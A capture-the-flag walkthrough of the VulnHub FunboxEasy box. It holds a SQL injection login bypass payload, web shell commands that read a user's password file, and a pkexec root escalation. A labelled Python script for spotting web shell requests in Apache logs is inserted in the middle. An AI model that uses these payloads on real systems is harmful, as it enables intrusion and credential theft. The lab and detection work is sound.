Boot2Root! Easy going, but with this Funbox you have to spend a bit more time. Much more, if you get stuck in good traps. But most of the traps have hints that they are traps. VulnHub link to download FunboxEasy: FunboxEasy
We always start with an nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
Nmap scan report for 192.168.250.111
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 17 04:15:11 2020 -- 1 IP address (1 host up) scanned in 67.65 seconds
OK, let's hit the robots.txt on port 80.
Gym: let's try to access it at IP/gym.
I spent a little time trying to get the right credentials but no luck, so I decided to bust some directories with dirbuster. I think the robots.txt is the first rabbit hole lol.
Another dir, let's check it out.
Small CRM Projects admin login page. Let's check for some default credentials or maybe a vulnerability to get in.
Description: There is a SQL injection vulnerability in the /index.php page which allows for an attacker to use the SQLi login bypass payload '=''or' for both the username and password parameters, this allows for any authenticated or low level user to login to the admin account.
Boom, we are in, but it's just another rabbit hole, number 2 lol. Let's enumerate more and go back to our dirbuster to check more dirs.
The store dir looks interesting, let's hit it.
Online Book Store by projectworlds; pretty old too, 2017. Cool.
Let's download and try the exploit.
Boom, finally we are in.
http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home
http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home/tony
http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=less /home/tony/password.txt
Boom, we have the SSH password and also the username, which is tony. Let's hit SSH.
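Seen from the defender's side, the requests above leave an obvious trace in the Apache access log: a .php file being executed out of an image directory, with a cmd parameter. The script below is an added example (not part of the original walkthrough) that flags such requests; the static-directory list, the parameter names and the sample log lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumptions for this example: which directories should hold only static
# assets, and which parameter names suggest a command-running script.
STATIC_DIRS = ("/img/", "/images/", "/uploads/", "/css/", "/js/")
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
SUSPECT_PARAMS = {"cmd", "exec", "command"}

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Constructed sample log: client address, timestamps, sizes and the two benign
# requests are made up; the .php path and cmd values are those in the walkthrough.
_TARGETS = [
    "index.php",
    "bootstrap/img/logo.png",
    "bootstrap/img/B8Wsi38YLp.php?cmd=ls%20-la%20/home",
    "bootstrap/img/B8Wsi38YLp.php?cmd=ls%20-la%20/home/tony",
    "bootstrap/img/B8Wsi38YLp.php?cmd=less%20/home/tony/password.txt",
]
SAMPLE_LOG = [
    f'192.168.250.10 - - [17/Nov/2020:04:4{i}:00 +0000] '
    f'"GET /store/{t} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    for i, t in enumerate(_TARGETS)
]

def find_webshell_requests(lines):
    """Flag requests that execute a script from a static-asset directory."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m["target"])
        path = url.path.lower()
        if not (path.endswith(SCRIPT_EXT) and any(d in path for d in STATIC_DIRS)):
            continue
        # parse_qsl percent-decodes, so "ls%20-la" is reported as "ls -la".
        params = {k.lower(): v for k, v in parse_qsl(url.query, keep_blank_values=True)}
        hits = sorted(SUSPECT_PARAMS.intersection(params))
        findings.append({"client": m["client"], "time": m["ts"],
                         "status": int(m["status"]), "path": url.path,
                         "command": params[hits[0]] if hits else None})
    return findings

if __name__ == "__main__":
    for finding in find_webshell_requests(SAMPLE_LOG):
        print(finding)
```

A script in a static directory is flagged even without a suspect parameter (command is None), since nothing in an image folder should be executing PHP in the first place.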
SSH: we are in. First things first, let's check sudo with sudo -l
Plenty of ways to get root, but let's go with /usr/bin/pkexec
Let's check GTFOBins.
Now let's run sudo pkexec /bin/sh
We are root. Box rooted.
Greetings from Muzec